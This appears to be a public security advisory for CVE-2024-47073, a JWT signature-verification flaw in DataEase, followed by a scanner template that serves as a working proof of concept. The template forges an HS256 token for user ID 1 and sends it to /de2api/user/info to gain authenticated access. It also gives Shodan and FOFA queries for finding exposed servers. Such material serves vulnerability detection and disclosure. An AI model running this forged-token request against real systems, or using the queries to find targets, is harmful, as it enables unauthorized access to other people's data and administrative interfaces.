DataEase is an open source data visualization analysis tool that helps users quickly analyze data and gain insights into business trends. In affected versions, the lack of signature verification of JWT tokens allows attackers to forge JWTs, which then allow access to any interface. The vulnerability has been fixed in v2.10.2 and all users are advised to upgrade. There are no known workarounds for this vulnerability.
PoC代码[已公开]
id: CVE-2024-47073
info:
name: DataEase v2.10.2 - JWT Signature Verification Bypass
author: iamnoooob,pdresearch
severity: critical
description: |
DataEase is an open source data visualization analysis tool that helps users quickly analyze data and gain insights into business trends. In affected versions, the lack of signature verification of JWT tokens allows attackers to forge JWTs, which then allow access to any interface. The vulnerability has been fixed in v2.10.2 and all users are advised to upgrade. There are no known workarounds for this vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-47073
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2024-47073
cwe-id: CWE-347
epss-score: 0.28152
epss-percentile: 0.96335
cpe: cpe:2.3:a:dataease:dataease:*:*:*:*:*:*:*:*
metadata:
verified: true
vendor: dataease
product: dataease
shodan-query: http.html:"dataease"
fofa-query: body="dataease"
tags: cve,cve2024,dataease,jwt
variables:
payload: '{"uid":1,"oid":1,"exp":{{unix_time(1000)}}}'
token: '{{generate_jwt(payload,"HS256","random") }}'
http:
- raw:
- |
GET /de2api/user/info HTTP/1.1
Host: {{Hostname}}
X-DE-TOKEN: {{token}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- data
- '"oid":"1"'
- code
condition: and
- type: status
status:
- 200
# digest: 4b0a0048304602210091bd95b87a457e0c7b8e0a032471b6e68e7c7c4be42f9d5ab57ab8ec9684a121022100b6b8ea4bf2a75a1079769bf0c530cc2ca93f110979ab5d5e18ae04dad3fad868:922c64590222798bb761d5b6d8e72950